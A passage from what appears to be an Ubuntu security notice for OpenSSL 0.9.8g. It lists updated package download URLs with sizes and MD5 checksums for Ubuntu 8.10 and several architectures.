Size/MD5: 610444 7a580326007e5b4d91b0706e67c48a37
http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.5_powerpc.deb
Size/MD5: 2078092 8ab29575374fa3fa2ccf629e6073b693
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.5_powerpc.deb
Size/MD5: 1639930 f2a1b83f7bea750bfbf580a736a47c93
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.5_powerpc.deb
Size/MD5: 945252 d20f005d5eb785f566c8324eddb48e7a
http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.5_powerpc.deb
Size/MD5: 399186 fc18b331e3bd595f133d520883c51504
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.5_sparc.udeb
Size/MD5: 559756 09bd953d0198b715033e08010ace983f
http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.5_sparc.deb
Size/MD5: 1984804 9fd8d32c6b19687e372e8796b3aa6d6b
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.5_sparc.deb
Size/MD5: 3874478 d1c50d445b3e64398f18f47ae1dc1d62
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.5_sparc.deb
Size/MD5: 2242128 20efe5a5cc265c63cac32cc3b8f0f0ad
http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.5_sparc.deb
Size/MD5: 397844 9bfb9864b3359116cba62d8b7446d570
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.2.diff.gz
Size/MD5: 56003 54b38c83a8c3887b28f2d9ad4b6ce450
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.2.dsc
Size/MD5: 1334 55087f573e1e5ae7a8b90e9d185c0ff1
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g.orig.tar.gz
Size/MD5: 3354792 acf70a16359bf3658bdfb74bda1c4419
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl-doc_0.9.8g-10.1ubuntu2.2_all.deb
Size/MD5: 628782 ae12bdd831506905603b8e039882b1d9
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-10.1ubuntu2.2_amd64.udeb
Size/MD5: 622134 5109e4ced8be0ca198056413f78c4bae
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-10.1ubuntu2.2_amd64.deb
Size/MD5: 2109822 779446d4d0db4385ab308d6a2256b649
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-10.1ubuntu2.2_amd64.deb
Size/MD5: 1685276 f366c23239d25ebc3e642376ef2b4ceb
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-10.1ubuntu2.2_amd64.deb
Size/MD5: 958010 5942c4d4c93420c44a90491d90f7efc3
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.2_amd64.deb
Size/MD5: 404000 3c4f3c2df2ae1f4e45b9abcd2e11db09
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-10.1ubuntu2.2_i386.udeb
Size/MD5: 578768 3f5ff22020c48524b16950b3a9d1abd9
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-10.1ubuntu2.2_i386.deb
Size/MD5: 1980772 dae54b8759e4c020a33b6833b6ce00ce
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-10.1ubuntu2.2_i386.deb
Size/MD5: 5605444 b0e7c675994623328937478100c5542f
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-10.1ubuntu2.2_i386.deb
Size/MD5: 2920398 40e825a72aa66c9926df39f5c50fb935
http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.2_i386.deb
Size/MD5: 398634 92d9a4454f168534f2a8d97af276f100
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-10.1ubuntu2.2_lpia.udeb
Size/MD5: 547432 2f5e8f60d9ef314881098161c87ad4bb
http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-10.1ubuntu2.2_lpia.deb
Size/MD5: 1958206 1ef7f269d10ced84323eb788af421da7
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-10.1ubuntu2.2_lpia.deb
Size/MD5: 1579156 5a899c61f8dfda67d788207586cc0ff1
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-10.1ubuntu2.2_lpia.deb
Size/MD5: 862872 cdd6b8f8d2349c64ce76d905108ad535
http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.2_lpia.deb
Size/MD5: 400634 5e91b33947e6a761a5aac52f00625bf3
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-10.1ubuntu2.2_powerpc.udeb
Size/MD5: 623248 f8b1b1ef6b8048d7d5553c1ff23f74a6
http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-10.1ubuntu2.2_powerpc.deb
Size/MD5: 2120300 df1f0689d35eafd92189589d8164d7b9
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-10.1ubuntu2.2_powerpc.deb
Size/MD5: 1704640 44af459f92233942ff324f2eabde8149
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-10.1ubuntu2.2_powerpc.deb
Size/MD5: 964806 8a0fdf26d12e5d7cd7b35cf3e5643d15
http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.2_powerpc.deb
Size/MD5: 402658 270040801e34138072585c8e3dfbdc02
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-10.1ubuntu2.2_sparc.udeb
Size/MD5: 567636 277a7ff784ba38b7079135881c5371ed
http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-10.1ubuntu2.2_sparc.deb
Size/MD5: 2013556 239e8f8d942ece17ed1ddb34a648a861
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-10.1ubuntu2.2_sparc.deb
Size/MD5: 4038398 1abc5165b8c6a518a85c032ec74d748a
http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-10.1ubuntu2.2_sparc.deb
Size/MD5: 2284986 0e6a5b2a8e27458ba35d7be276eb561a
http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.2_sparc.deb
Size/MD5: 406772 28877b3fa3413e18f8e0433efcd98cc8